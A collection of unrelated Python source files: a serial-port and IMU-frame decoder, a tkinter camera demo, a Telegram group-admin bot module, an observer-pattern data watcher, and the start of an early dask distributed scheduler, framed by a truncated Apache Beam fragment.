self._cleanup_callbacks = ()
if has_exception:
raise
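# --- Hedged usage sketch (illustrative, not part of this module) ---
# A minimal pipeline submitted through the PortableRunner defined above. The job
# endpoint address and the chosen environment are assumptions for the example only;
# a job service must already be listening at that address for the submission to work.
#
#   import apache_beam as beam
#   from apache_beam.options.pipeline_options import PipelineOptions
#
#   opts = PipelineOptions([
#       '--runner=PortableRunner',
#       '--job_endpoint=localhost:8099',   # assumed job service address
#       '--environment_type=LOOPBACK',     # aliased to EXTERNAL via ENV_TYPE_ALIASES above
#   ])
#   with beam.Pipeline(options=opts) as p:
#       (p | beam.Create([1, 2, 3]) | beam.Map(lambda x: x * 2))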
|
camera_demo.py
|
import time
import threading
import tkinter as tk
from PIL import Image
from PIL import ImageTk
import cv2
# Prepare the window
window = tk.Tk()
window.title('Camera Demo')
window.geometry('640x480')
# Creates a thread for openCV processing
def start_as_background_task(loop_function):
run_event = threading.Event()
run_event.set()
action = threading.Thread(target=loop_function, args=(run_event,))
    action.daemon = True
action.start()
return run_event
# This is the infinite loop where we display the camera feed
def cvloop(run_event):
camera = cv2.VideoCapture(0)
# Run while the app hasn't been terminated
while run_event.is_set():
# Read an image from the camera feed
_, image = camera.read()
# Convert it from BGR to RGB
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# Prepare it for displaying on tkinter
image = Image.fromarray(image)
image = ImageTk.PhotoImage(image)
display.configure(image=image)
display.image = image
camera.release()
# Main widget for holding the camera feed
display = tk.Label(window)
display.pack(padx=10, pady=10)
# This is needed for the GUI to display the camera feed properly
run_event = start_as_background_task(cvloop)
# Clean everything up when the user wants to quit
def terminate():
global window, run_event
run_event.clear()
time.sleep(.5)
window.destroy()
print("Bye!")
# When the GUI is closed it calls the terminate() function
window.protocol("WM_DELETE_WINDOW", terminate)
# Show the GUI
window.mainloop()
|
mySerial.py
|
import numpy as np
import serial  # import the pyserial module
import serial.tools.list_ports
import threading
import time
# Return the device names of all available serial ports
def checkPorts():
return [sp.device for sp in serial.tools.list_ports.comports()]
class Port:
def __init__(self, portname='com9', bps=115200, maxtime=1, bytesize=8, parity='none', stopbits=1):
        # Baud rate: one of the standard values
        # Timeout: None waits forever, 0 returns immediately, any other value is the wait time in seconds
        # Open the serial port and obtain the port object
self.ser = serial.Serial(portname, bps, timeout=maxtime,
bytesize={5: serial.FIVEBITS, 6: serial.SIXBITS, 7: serial.SEVENBITS,
8: serial.EIGHTBITS}[bytesize], parity=
{'none': serial.PARITY_NONE, 'even': serial.PARITY_EVEN, 'odd': serial.PARITY_ODD,
'mark': serial.PARITY_MARK, 'space': serial.PARITY_SPACE}[parity], stopbits=
{1: serial.STOPBITS_ONE, 1.5: serial.STOPBITS_ONE_POINT_FIVE, 2: serial.STOPBITS_TWO}[
stopbits])
self.encoding = 'gbk'
self.decoding = 'gbk'
if (self.ser.is_open):
            # Print the detailed port parameters
            print(self.ser)
            print("your serial port had been opened whose info will be showed next ..")
            print("your device named", self.ser.name)  # device name
            print("port type is", self.ser.port)  # port used for reading/writing
            print('your baud is', self.ser.baudrate)
            print("bytesize is", self.ser.bytesize)  # byte size
            print("parity is", self.ser.parity)  # parity bit
            print("stopbits is", self.ser.stopbits)  # stop bits
            print("timeout is", self.ser.timeout)  # read timeout
            print("writeTimeout is", self.ser.writeTimeout)  # write timeout
            print("xonxoff is", self.ser.xonxoff)  # software flow control (XON/XOFF)
            print("rtscts is ", self.ser.rtscts)  # hardware flow control (RTS/CTS)
            print("dsrdtr is", self.ser.dsrdtr)  # hardware flow control (DSR/DTR)
            print("interCharTimeout", self.ser.interCharTimeout)  # inter-character timeout
            print('your serial port is', self.ser.port)
else:
raise Exception("serial port error!")
    # Number of bytes to read and the output format; decoded as utf8 by default
def getInfo(self):
return f"""your serial port had been opened whose info will be showed next .." \n
"your device named", {self.ser.name} \n
"port type is", {self.ser.port}\n
'your baud is', {self.ser.baudrate}\n
"bytesize is", {self.ser.bytesize}\n
"parity is", {self.ser.parity}\n
"stopbits is", {self.ser.stopbits}\n
"timeout is", {self.ser.timeout}\n
"writeTimeout is", {self.ser.writeTimeout}\n
"xonxoff is", {self.ser.xonxoff}\n
"rtscts is ", {self.ser.rtscts}\n
"interCharTimeout", {self.ser.interCharTimeout}\n
'your serial port is', {self.ser.port}"""
def help(self):
        # Print the methods that can be used
        # print(ser.read())                     # read one byte
        # print(ser.read(10).decode("utf8"))    # read ten bytes
        # print(ser.readline().decode("utf8"))  # read one line
        # print(ser.readlines())                # read several lines; returns a list, must be used together with a timeout
        # print(ser.in_waiting)                 # number of bytes remaining in the input buffer
        # print(ser.out_waiting)                # number of bytes in the output buffer
        print(__doc__)
        print("""
        ser=serial.Serial("/dev/ttyUSB0",9600,timeout=0.5)   # serial port over a USB adapter
        ser=serial.Serial("/dev/ttyAMA0",9600,timeout=0.5)   # serial port on the Raspberry Pi GPIO header
        ser=serial.Serial(1,9600,timeout=0.5)                 # COM1 on Windows
        ser=serial.Serial("com1",9600,timeout=0.5)            # COM1 on Windows
        ser=serial.Serial("/dev/ttyS1",9600,timeout=0.5)      # COM1 on Linux
        """)
        print("Port object attributes")
        print("""
        name: device name
        port: port used for reading or writing
        baudrate: baud rate
        bytesize: byte size
        parity: parity bit
        stopbits: stop bits
        timeout: read timeout
        writeTimeout: write timeout
        xonxoff: software flow control
        rtscts: hardware flow control
        dsrdtr: hardware flow control
        interCharTimeout: inter-character timeout
        """)
        print("Common methods")
        print("""
        ser.isOpen(): check whether the port is open.
        ser.open(): open the port.
        ser.close(): close the port.
        ser.read(): read bytes from the port, one byte by default.
        ser.read_all(): read all available bytes from the port.
        ser.write("hello"): write data to the port.
        ser.readline(): read one line of data.
        ser.readlines(): read several lines of data.
        in_waiting(): number of bytes in the receive buffer.
        flush(): wait until all outgoing data has been written.
        flushInput(): discard all data in the receive buffer.
        flushOutput(): abort the current write and discard the data in the send buffer.
        """)
        print("Methods of this class")
print(self.__dict__)
def decodeMPU6050(self, frames):
        # // Send data to the anonymous-protocol quadcopter ground-station software (V2.6)
        # // fun: function byte, 0XA0~0XAF
        # // data: data buffer, at most 28 bytes!!
        # // len: number of valid bytes in data
        # void usart1_niming_report(u8 fun,u8*data,u8 len)
        # {
        # u8 send_buf[32];
        # u8 i;
        # if(len>28)return; // at most 28 bytes of data
        # send_buf[len+3]=0; // zero the checksum
        # send_buf[0]=0X88; // frame header
        # send_buf[1]=fun; // function byte
        # send_buf[2]=len; // data length
        # for(i=0;i<len;i++)send_buf[3+i]=data[i]; // copy the data
        # for(i=0;i<len+3;i++)send_buf[len+3]+=send_buf[i]; // compute the checksum
        # for(i=0;i<len+4;i++)usart1_send_char(send_buf[i]); // send the frame over USART1
        # }
        # void usart1_report_imu(short aacx,short aacy,short aacz,short gyrox,short gyroy,short gyroz,short roll,short pitch,short yaw)
        # {
        # u8 tbuf[28];
        # u8 i;
        # for(i=0;i<28;i++)tbuf[i]=0; // clear to 0
        # tbuf[0]=(aacx>>8)&0XFF;
        # tbuf[1]=aacx&0XFF;
        # tbuf[2]=(aacy>>8)&0XFF;
        # tbuf[3]=aacy&0XFF;
        # tbuf[4]=(aacz>>8)&0XFF;
        # tbuf[5]=aacz&0XFF;
        # tbuf[6]=(gyrox>>8)&0XFF;
        # tbuf[7]=gyrox&0XFF;
        # tbuf[8]=(gyroy>>8)&0XFF;
        # tbuf[9]=gyroy&0XFF;
        # tbuf[10]=(gyroz>>8)&0XFF;
        # tbuf[11]=gyroz&0XFF;
        # tbuf[18]=(roll>>8)&0XFF;
        # tbuf[19]=roll&0XFF;
        # tbuf[20]=(pitch>>8)&0XFF;
        # tbuf[21]=pitch&0XFF;
        # tbuf[22]=(yaw>>8)&0XFF;
        # tbuf[23]=yaw&0XFF;
        # usart1_niming_report(0XAF,tbuf,28); // flight-controller display frame, 0XAF
        # }
        # Decode the incoming array of hex byte strings:
        # bytes 0~2 are the frame header, function byte and data length
        # byte 31 is the checksum
        # bytes 3 to 30 are the data: exactly 28 bytes (0~27), of which only 24 are currently used, the rest are 0
        # frames length is a multiple of 32
        # discard everything before the first '88' header byte
if frames!=[]:
if not issubclass(type(frames),Exception):
try:
find=frames.index('88')
except Exception as e:
                    return Exception(str(e) + "..no MCU frame header 0x88 was found; check whether the data frame is valid")
frames=frames[find:]
if (len(frames)<32):
return Exception("数据帧格式错误,必须为32整数")
frameLeng=32
framesNum=int(len(frames)/frameLeng)
frameList=[[bin(int('0x'+j,16)) for j in frames[i*32:i*32+32]] for i in range(framesNum)]
flag= bin(int('0xaf',16))
rpy = [0, 0, 0]
for frame in frameList:
                    if (frame[1] ==flag):  # corresponds to usart1_report_imu
                        # compute the checksum
checksum = int(frame[31],2)
data=sum([int(i,2) for i in frame[:31]])
if data% 256 == checksum:
index=0
for i in range(21, 27, 2):
sign=1
low=frame[i+1][2:]
high=frame[i][2:]
while(len(low)<8):
low='0'+low
# print(f"如今的high={high} low={low} ")
if(high[0]=='1' and len(high)==8):
hlist=list(high)
llist=list(low)
sign=-1
for h in range(len(high)):
if(high[h]=='1'):
hlist[h]='0'
else:
hlist[h]='1'
for l in range(len(low)):
if(llist[l]=='1'):
llist[l]='0'
else:
llist[l]='1'
high=''.join(hlist)
low=''.join(llist)
rpy[index]+=int(high+low,2)*sign
index+=1
data=list(np.divide(rpy[:2],[framesNum*100]))
data.append(rpy[2]/(10*framesNum))
return data
else:
return Exception("frames 犯病了,原因是"+str(frames))
else:
return Exception("MPU frames为空")
        # checksum
# checksum = frame[31]
        # # verify
# if sum(data)%256==checksum:
        # # high byte of aacx
# aacx=frame[3]*16+frame[4]
# aacy=frame[5]*16+frame[6]
# aacz=frame[7]*16+frame[8]
# gyrox=frame[9]*16+frame[10]
# gyroy= frame[11] * 16 + frame[12]
# gyroz = frame[13] * 16 + frame[14]
# # +7
#
# print([aacx,aacy,aacz,gyrox,gyroy,gyroz,roll,pitch,yaw])
# print(frame[23],frame[24])
# print(roll,pitch,yaw)
# # mpudata.append([aacx,aacy,aacz,gyrox,gyroy,gyroz,roll,pitch,yaw])
@staticmethod
def decodeLcd():
def decode_RLE(inbuf,inSize):
src=inbuf;
srcIndex=0
with open('decoded.txt','w+')as f :
while(srcIndex<inSize):
sign=src[srcIndex]
srcIndex+=1
count=abs(sign)-0x80 if sign<0 else sign
# print(count,sign)
if(sign<0):
                        # print('repeated run:', count, src[srcIndex])
for i in range(count):
f.write(hex(abs(src[srcIndex]))[2:])
srcIndex+=1
else:
                        # print('non-repeated run:', count)
for i in range(count):
# print(src[srcIndex])
h=hex(abs(src[srcIndex]))[2:]
if len(h)==1:
h='0'+h
if sign==4 and h in ['01','02'] :
pass
elif sign==2 and h in ['05','06','03','04'] :
pass
else:
f.write(h)
srcIndex+=1;
with open('lcd.txt') as f:
frames=f.read()
# print(frames)
print(frames)
decodeFrames=[]
for i in range(0, len(frames), 2):
                # negative, which marks a repeated run
a=int(frames[i:i+2],16)
if a>0x80:
decodeFrames.append(-a)
else:
decodeFrames.append(a)
decodeFrames.append(0)
print(len(decodeFrames))
#7042
decode_RLE(decodeFrames,len(decodeFrames))
def readLCD(self):
self.wholeData=''
self.byteCount=0
self.timecount=0
self.lcdFrames=""
while self.ser.in_waiting == 0:
pass
        print('Started recording data')
with open('lcd.txt','w+') as f:
start = self.ser.read(self.ser.in_waiting).hex()
time1=time.time()
self.lcdFrames+=start
self.byteCount += len(self.lcdFrames)
f.write(self.lcdFrames)
count=0
waiting1=0
waiting2=0
try:
while 1:
if self.ser.in_waiting > 0:
# print(self.ser.in_waiting)
if self.ser.in_waiting==22446:
time2=time.time()
                            print('Transfer finished, took {}'.format(time2 - time1))
break
# self.wholeData =self.ser.read(self.ser.in_waiting).hex()
# # print(self.wholeData)
# self.byteCount += len(self.wholeData)
# f.write(self.wholeData)
# if self.wholeData.rfind('0304')!=-1:
# time2 = time.time()
                        # print('Transfer finished, took {}s, total bytes {}, speed {}kb/s'.format(time2-time1,self.byteCount,self.byteCount/(time2-time1)/1024))
# self.ser.close()
# break
else:
self.wholeData = ""
except Exception as e:
print(e)
def readline(self, options="text"):
if(self.ser.is_open):
if options == "hex":
s=self.ser.readline().hex()
return [s[i:i+2] for i in range(0,len(s),2)]
elif options == "text":
try:
return self.ser.readline().decode(self.decoding)
except Exception as e:
return e
elif options == "all":
pass
else:
raise Exception("please input right format like hex or text but no",options)
else:
return Exception("串口已关闭,你在读nm呢")
def readData(self, num: int, options="text") -> str:
        # Choose hexadecimal or plain-text output
if(self.ser.is_open):
if options == "hex":
s=self.ser.read(num).hex()
                if s != '':
return [s[i:i+2] for i in range(0,len(s),2)]
else:
return Exception("艹,这是一个空帧")
elif options == "text":
try:
t=self.ser.read(num).decode(self.decoding)
if t!='':
return t
else:
return Exception("空空空数据")
except Exception as e:
return Exception("text出现了什么问题呢?"+str(e))
elif options == "all":
pass
else:
raise Exception("please input right format like hex or text but no",options)
else:
return Exception("串口已关闭,你在读nm呢")
def getWholeData(self, options='text'):
if(self.ser.is_open):
"""很重要!!!"""
time.sleep(0.05)
try:
if self.ser.in_waiting>0:
self.wholeData = self.readData(self.ser.in_waiting, options=options)
                    # print(self.wholeData)  # debug output
                    # wait for the transfer to start
else:
self.wholeData = []
except Exception as e:
return e
return self.wholeData
else:
return Exception("串口已关闭,你在读nm呢")
def hangThread2ReadData(self,options):
print("-------- start hanging to read data -------- ")
while(self.hang):
self.getWholeData(options)
def writeData(self, string: str) -> int:
        # Returns the number of bytes successfully written
num = self.ser.write(string.encode(self.encoding))
        # print("wrote {} bytes!".format(num))
return num
    # Starts a background thread by default
def readDataByThtead(self, options='text', thread=True):
self.wholeData = ''
self.hang=1
        # Receive data in a loop; the loop never ends, so it can be run in a thread
if (thread):
th = threading.Thread(target=self.hangThread2ReadData, name='getWholedata', args=([options]))
th.start()
else:
self.getWholeData(options)
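# --- Hedged usage sketch (illustrative, not part of the original module) ---
# How the Port class above might be used. The port name 'com9' and the 115200 baud
# rate are assumptions taken from the constructor defaults; a real device must be
# attached for the reads below to return anything.
#
#   print(checkPorts())                        # list the serial devices present on this machine
#   port = Port(portname='com9', bps=115200, maxtime=1)
#   port.writeData('hello')                    # write a GBK-encoded string to the device
#   frame = port.readData(32, options='hex')   # read 32 bytes back as a list of hex byte strings
#   if not isinstance(frame, Exception):
#       print(port.decodeMPU6050(frame))       # decode roll/pitch/yaw from an IMU frame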
|
unparse.py
|
from ast import parse
from os import link
from mysql.connector import connection
from telegram.parsemode import ParseMode
import modules.core.extract as extract
import time
import threading
import itertools
from multiprocessing.pool import ThreadPool
import modules.core.database as database
from modules.core.warn import warn
import json
from config import *
chat_lock = []
chat_lock_bool = 0
class unparse_cls():
next_id = 0
def __init__(self, update, context) -> None:
#threading.Thread.__init__(self)
#threading.Thread.start(self)
#print(threading.Thread.getName,threading.current_thread().ident)
#print(object(),self.id,threading.Thread.getName,threading.current_thread().ident)
#time.sleep(3)
self.update = update
self.context = context
self.msg = None
self.user = None
self.tag_msg = None
self.tag_user = None
self.msg = update.message
self.user = user = self.msg['from_user']
self.chat = chat = self.msg['chat']
self.db = database.bot_db()
try:
self.tag_msg = tag_msg = update.message.reply_to_message
self.tag_user = tag_user = tag_msg['from_user']
self.tag_user_id = tag_user["id"]
self.db.add_user(user=tag_user)
except:
pass
self.db.parse(chat=chat, user=user)
self.user_id = self.user["id"]
self.chat_id = self.chat["id"]
self.msg_string = self.msg.text
#self.lock_del
#del self
#del(self)
def admin_sync(self, stri=0):
chat = self.update.effective_chat
administrators = chat.get_administrators()
text = ""
for admin in administrators:
            status = admin.status
            user = admin.user
self.db.add_user(user)
self.db.add_link(chat,user,status,1)
if stri == 1:
if status == "creator":
text = "(Owner) " + user["first_name"] + text
else:
text = text + "\n" + "(Admin) " + user["first_name"]
return text
def sync(self, rep = 0):
ms = None
if rep == 1:
ms = self.msg.reply_text("Syncing...", parse_mode="HTML",disable_web_page_preview=True)
try:
self.db.add_chat(self.chat)
except: pass
self.admin_sync()
for x,y in enumerate(self.db.get_link(self.chat_id,comp=1)):
detail = self.context.bot.get_chat_member(
self.chat_id, y[2] )
self.db.add_link(self.chat,detail.user,detail["status"],replace=3)
database.create_db()
if rep == 1:
ms.edit_text("Synced !", parse_mode="HTML",disable_web_page_preview=True)
def group_info(self):
text = self.admin_sync(stri=1)
count = self.chat.get_member_count()
try:
username = self.chat["username"]
uname = "\nUsername : @" + username
except:
uname = ""
try:
link_name = self.context.bot.exportChatInviteLink(self.chat_id)
except:
try:
link_name = "telegram.me/" + username
except:
link_name = "Unable to fetch the links ! "
#link_name = "<a href='" + invitelink + "'>telegram.me/joinchat/</a>"
text = "Group Info -\n\n" + \
"ID : " + str(self.chat_id) + \
"\nName : " + self.chat["title"] + uname + \
"\nMembers : " + str(count) + \
"\n\nAdministrators :\n" + text + \
"\n\nGroup link : " + link_name
#text = self.db.get_link(self.chat_id)
self.msg.reply_text(text, parse_mode="HTML",disable_web_page_preview=True)
def user_info(self):
li = self.db.get_link(self.chat_id,self.tag_user_id)
status = "\nStatus : " + li[3]
bot = ""
if self.tag_user['is_bot'] == True:
bot = "\nBot : True"
spot = "\nSpotted on : " + str(li[5])
warns = self.db.get_warn(self.chat_id,self.tag_user_id)[0][7]
if warns != 0:
warns = "\nWarn Strike/s : " + str(warns)
else:
warns = ""
try:
username = self.tag_user["username"]
uname = "\nUsername : @" + self.tag_user["username"]
except:
uname = ""
try:
ulink = "\nUser link : " + "<a href='https://telegram.me/" + \
username + "'>" + "https://telegram.me/" + username + "</a>"
except:
ulink = ""
try:
plink = "\nPermanent link : " + "<a href='tg://user?id=" + \
str(self.tag_user_id) + "'>Click Here</a>"
pass
except:
pass
try:
lname = " " + self.tag_user["last_name"]
except:
lname = ""
text = "User Info - \n\n" + \
"Id : " + str(self.tag_user_id) +\
"\nName : " + self.tag_user["first_name"] + lname +\
uname + ulink + \
"\n\nIn-Group Details :\n" + bot + status + spot + warns + plink
self.msg.reply_text(text, parse_mode="HTML",disable_web_page_preview=True)
def msg_info(self):
msg_id = self.tag_msg.message_id
msgid = "\n\nMessage id : " + str(msg_id)
userid = " (" + str(self.tag_user_id) + ")"
try:
first_name = self.tag_user.first_name
if first_name == None:
first_name = ""
except:
first_name = ""
try:
last_name = self.tag_user.last_name
if last_name == None:
last_name = ""
except:
last_name = ""
try:
user_name = self.tag_user.username
if user_name == None:
name = "\nName : <a href='tg://user?id=" + \
str(self.tag_user_id) + "'>" + str(first_name) + \
" " + str(last_name) + "</a>" + str(self.tag_user_id)
else:
name = "\nName : <a href='telegram.me/" + \
str(user_name)+"'>" + str(first_name) + \
" " + str(last_name) + "</a>" + userid
except:
user_name = "<a href='tg://user?id=" + \
str(self.tag_user_id) + "'>" + str(first_name) + "</a>"
name = "\nName : <a href='tg://user?id=" + \
str(self.tag_user_id) + "'>" + str(first_name) + \
" " + str(last_name) + "</a>" + userid
try:
grpusr = self.chat["username"]
except: pass
try:
date = "\nDate : " + str(self.tag_msg.date)
except:
date = ""
try:
edt = self.tag_msg.edit_date
if edt != None:
edit_date = "\nEdited : " + str(edt)
else:
edit_date = ""
except:
edit_date = ""
try:
link = "\nMessage link : <a href='" + self.tag_msg.link + "'>Link</a>"
except:
link = ""
try:
chat_name = "\nChat : " + " <a href='t.me/" + grpusr + \
"'>" + self.chat["title"] + "</a> ("+str(self.chat_id)+")"
except:
chat_name = ""
try:
textt = '\nText :\n<b>------------------</b>\n<i>' + \
self.tag_msg.text + '</i>\n<b>------------------</b>'
except:
textt = "Type : #FILE"
try:
ftype = self.tag_msg.document.mime_type
file = self.tag_msg.document.file_name
file_id = self.tag_msg.document.file_unique_id
file_size = self.tag_msg.document.file_size/1000000
textt = "\nType : " + ftype + "\nFile_name : " + str(file) +"\nFile Id : " + str(file_id) + "\nfile_size : " + str(file_size) + "mb"
except Exception as x:
print(x)
textt = textt + " (Use /json for more detail)"
text = ("<b>Message Info -</b>" +
msgid +
name +
chat_name + "\n" +
textt + "\n" +
date +
edit_date +
link)
self.msg.reply_text(text=text,
parse_mode="HTML")
def json(self):
m = extract.sudo_check_2(msg=self.msg,del_lvl=0,context=self.context)
if m==0:
return
if self.tag_msg == None:
self.msg.reply_text(text="Tag a message or file to see its full backend details !",
parse_mode="HTML")
return
j = "<code>" + json.dumps(self.tag_msg, indent=4, sort_keys=True, default=str) + "</code>"
self.msg.reply_text(text=j,
parse_mode="HTML")
def router(self):
res = self.msg_string.split(None, 1)
if res[0] == "/info":
if self.tag_msg == None:
self.group_info()
else:
if self.tag_user == None:
self.tag_user = self.user
self.tag_user_id = self.user_id
self.user_info()
elif res[0] == "/json":
self.json()
elif res[0] == "/sync":
self.sync(rep=1)
elif res[0] == "/msgid":
if self.tag_msg != None:
self.msg_info()
else:
self.msg.reply_text("Tag a message !")
def thread_unparse(update, context):
threading.Thread(target=unparse_cls(update,context).router, args=(), daemon=True).start()
def filter(update,context):
#start = time.process_time()
db = database.bot_db()
msg = update.message
user = msg['from_user']
chat = msg['chat']
tag_user = None
try:
tagmsg = update.message.reply_to_message
tag_user = tagmsg['from_user']
db.add_user(user=tag_user)
except:
pass
db.parse(chat=chat, user=user)
chat_id = chat["id"]
user_id = user["id"]
sett = db.get_settings(chat_id)
filter_bool = sett[5]
note_bool = sett[6]
lock_bool = sett[7]
admin = 0
link = db.get_link(chat_id,user_id)[3]
if (link == "administrator" or link == "creator"):
admin = 1
#msg_string = None
def filter_del(): #use extractor | sudo check
if admin == 0:
msg.delete()
def filter_filt():
msg_string = msg.text
if note_bool == 1:
if msg_string.startswith("#") == True:
note_check(msg_string[1:])
return
for x,y in enumerate(db.get_filter(chat_id)):
if y[2].casefold() in msg_string.casefold():
if y[3] == 0:
if admin==0:
msg.delete()
return
elif y[3] == 1:
msg.reply_text(y[4])
if y[5] == 1:
msg.delete()
elif y[3] == 2:
if admin == 0:
warn(update,context).warn_strike(y[4])
if y[5] == 1:
msg.delete()
return
def note_check(note_name):
note = db.get_note_text(chat_id=chat_id, note_name=note_name)
try:
text = str(note[3])
msg.reply_text(text, disable_web_page_preview=True)
return
except:
#msg.reply_text("Note not found !")
return
if lock_bool == 1:
filter_del()
return
elif filter_bool == 1:
filter_filt()
elif note_bool == 1 and filter_bool == 0:
msg_string = msg.text
if msg_string.startswith("#") == True:
note_check(msg_string[1:])
return
#print("\n", time.process_time() - start, "\n")
|
data_watcher ver 2.py
|
from threading import Thread
class Watch:
""" Watch class to implement a data-observer pattern on the encapsulated data item.
The event-handlers/callbacks will be ran when the data is changed/set. """
    def __init__(self, data):
        """ Pass constructor the data item to be watched """
        self.__data = data
        # __on_set_cbs callback functions run the moment set method is used to set a value to the variable.
        self.__on_set_cbs = []
        # __on_change_cbs callback functions only run if the new value set is different from the previous value.
        # Both lists are per-instance so that separate Watch objects do not share listeners.
        self.__on_change_cbs = []
# Method to set a value to the data variable watched by this class
def set(self, data):
# If set is called and data value has been changed, save the data and run on change callbacks
if data != self.__data: # Check for data equality, so will not work for object references
self.__data = data
# Call all the __on_change_cbs callback functions
self.__event(self.__on_change_cbs)
# Regardless of data, call all the __on_set_cbs callback functions when set method called.
self.__event(self.__on_set_cbs)
# Return self reference to allow method call chainings.
return self
# Decorated Method to use as an attribute to get watched/stored data
@property
def value(self):
return self.__data
# Method to append a new callback function to be ran when the set method is called
def on_set(self, cb):
self.__on_set_cbs.append(cb)
# Return self reference to allow method call chainings.
return self
# Method to append a new callback function to be ran when the watched data is changed
def on_change(self, cb):
self.__on_change_cbs.append(cb)
# Return self reference to allow method call chainings.
return self
    def removeListener(self, cb=None):
        # Remove the given callback from both listener lists; clear all listeners if cb is None.
        if cb is None:
            self.__on_set_cbs.clear()
            self.__on_change_cbs.clear()
        else:
            for cbs in (self.__on_set_cbs, self.__on_change_cbs):
                if cb in cbs:
                    cbs.remove(cb)
        return self  # Return self reference to allow method call chainings.
# "Hidden" method that is called when the data is changed, to run all the given callbacks in seperate threads
def __event(self, callbacks):
        # Loop through and run all the callbacks as separate threads
for cb in callbacks:
Thread(target=cb, daemon=True, args=(self.__data,)).start()
""" Allow user to do w(5) to pass set method the value 5, where w = Watch(1) """
__call__ = set
""" Allow user to do w += hello, where hello is a function passed to the on_set method """
__iadd__ = on_set
""" Note that there is no abbrev. for the on_change method call """
""" __isub__
if type(item) == object:
self.__data = hash(data)
self.__primitive = False
else:
self.__data = data
self.__primitive = True """
__add__ = on_change
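# --- Hedged usage sketch (illustrative, not part of the original class) ---
# A tiny demonstration of the observer pattern above; the callback below is an
# assumption for the example only. Callbacks run in daemon threads, hence the sleep.
if __name__ == '__main__':
    import time

    def announce(value):
        print('watched data is now', value)

    w = Watch(1)
    w.on_change(announce)   # runs only when the value actually changes
    w += announce           # __iadd__ is an alias for on_set: runs on every set()
    w(2)                    # __call__ is an alias for set(): fires both callbacks
    w.set(2)                # unchanged value: only the on_set callback fires
    time.sleep(0.1)         # give the daemon callback threads a moment to print
    print('final value:', w.value)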
|
scheduler.py
|
from __future__ import print_function
import socket
import uuid
import itertools
import traceback
import sys
import random
from collections import defaultdict
from multiprocessing.pool import ThreadPool
from datetime import datetime
from threading import Thread, Lock, Event
from contextlib import contextmanager
import dill
import zmq
from ..compatibility import Queue, unicode, Empty
try:
import cPickle as pickle
except ImportError:
import pickle
from ..core import get_dependencies, flatten
from .. import core
from ..async import (sortkey, finish_task,
start_state_from_dask as dag_state_from_dask)
with open('log.scheduler', 'w') as f: # delete file
pass
def log(*args):
with open('log.scheduler', 'a') as f:
print('\n', *args, file=f)
@contextmanager
def logerrors():
try:
yield
except Exception as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
tb = ''.join(traceback.format_tb(exc_traceback))
log('Error!', str(e))
log('Traceback', str(tb))
raise
class Scheduler(object):
""" Disitributed scheduler for dask computations
Parameters
----------
hostname: string
hostname or IP address of this machine visible to outside world
port_to_workers: int
Port on which to listen to connections from workers
port_to_clients: int
Port on which to listen to connections from clients
bind_to_workers: string
Addresses from which we accept worker connections, defaults to *
bind_to_clients: string
Addresses from which we accept client connections, defaults to *
block: bool
Whether or not to block the process on creation
State
-----
workers - dict
Maps worker identities to information about that worker
who_has - dict
Maps data keys to sets of workers that own that data
worker_has - dict
Maps workers to data that they own
data - dict
Maps data keys to metadata about the computation that produced it
to_workers - zmq.Socket (ROUTER)
Socket to communicate to workers
to_clients - zmq.Socket (ROUTER)
Socket to communicate with users
collections - dict
Dict holding shared collections like bags and arrays
"""
def __init__(self, port_to_workers=None, port_to_clients=None,
bind_to_workers='*', bind_to_clients='*',
hostname=None, block=False, worker_timeout=20):
self.context = zmq.Context()
hostname = hostname or socket.gethostname()
# Bind routers to addresses (and create addresses if necessary)
self.to_workers = self.context.socket(zmq.ROUTER)
if port_to_workers is None:
port_to_workers = self.to_workers.bind_to_random_port('tcp://' + bind_to_workers)
else:
self.to_workers.bind('tcp://%s:%d' % (bind_to_workers, port_to_workers))
self.address_to_workers = ('tcp://%s:%d' % (hostname, port_to_workers)).encode()
self.worker_poller = zmq.Poller()
self.worker_poller.register(self.to_workers, zmq.POLLIN)
self.to_clients = self.context.socket(zmq.ROUTER)
if port_to_clients is None:
port_to_clients = self.to_clients.bind_to_random_port('tcp://' + bind_to_clients)
else:
self.to_clients.bind('tcp://%s:%d' % (bind_to_clients, port_to_clients))
self.address_to_clients = ('tcp://%s:%d' % (hostname, port_to_clients)).encode()
# Client state
self.clients = dict()
# State about my workers and computed data
self.workers = dict()
self.who_has = defaultdict(set)
self.worker_has = defaultdict(set)
self.available_workers = Queue()
self.data = defaultdict(dict)
self.collections = dict()
self.send_to_workers_queue = Queue()
self.send_to_workers_recv = self.context.socket(zmq.PAIR)
_port = self.send_to_workers_recv.bind_to_random_port('tcp://127.0.0.1')
self.send_to_workers_send = self.context.socket(zmq.PAIR)
self.send_to_workers_send.connect('tcp://127.0.0.1:%d' % _port)
self.worker_poller.register(self.send_to_workers_recv, zmq.POLLIN)
self.pool = ThreadPool(100)
self.lock = Lock()
self.status = 'run'
self.queues = dict()
self._schedule_lock = Lock()
# RPC functions that workers and clients can trigger
self.worker_functions = {'heartbeat': self._heartbeat,
'status': self._status_to_worker,
'finished-task': self._worker_finished_task,
'setitem-ack': self._setitem_ack,
'getitem-ack': self._getitem_ack}
self.client_functions = {'status': self._status_to_client,
'get_workers': self._get_workers,
'register': self._client_registration,
'schedule': self._schedule_from_client,
'set-collection': self._set_collection,
'get-collection': self._get_collection,
'close': self._close}
# Away we go!
log(self.address_to_workers, 'Start')
self._listen_to_workers_thread = Thread(target=self._listen_to_workers)
self._listen_to_workers_thread.start()
self._listen_to_clients_thread = Thread(target=self._listen_to_clients)
self._listen_to_clients_thread.start()
self._monitor_workers_event = Event()
self._monitor_workers_thread = Thread(target=self._monitor_workers,
kwargs={'timeout': worker_timeout})
self._monitor_workers_thread.start()
if block:
self.block()
def _listen_to_workers(self):
""" Event loop: Listen to worker router """
while self.status != 'closed':
try:
socks = dict(self.worker_poller.poll(100))
if not socks:
continue
except zmq.ZMQError:
break
if (self.send_to_workers_recv in socks and
not self.send_to_workers_recv.closed):
self.send_to_workers_recv.recv()
while not self.send_to_workers_queue.empty():
msg = self.send_to_workers_queue.get()
self.to_workers.send_multipart(msg)
self.send_to_workers_queue.task_done()
if self.to_workers in socks:
address, header, payload = self.to_workers.recv_multipart()
header = pickle.loads(header)
if 'address' not in header:
header['address'] = address
log(self.address_to_workers, 'Receive job from worker', header)
try:
function = self.worker_functions[header['function']]
except KeyError:
log(self.address_to_workers, 'Unknown function', header)
else:
future = self.pool.apply_async(function, args=(header, payload))
def _listen_to_clients(self):
""" Event loop: Listen to client router """
while self.status != 'closed':
try:
if not self.to_clients.poll(100): # is this threadsafe?
continue
except zmq.ZMQError:
break
with self.lock:
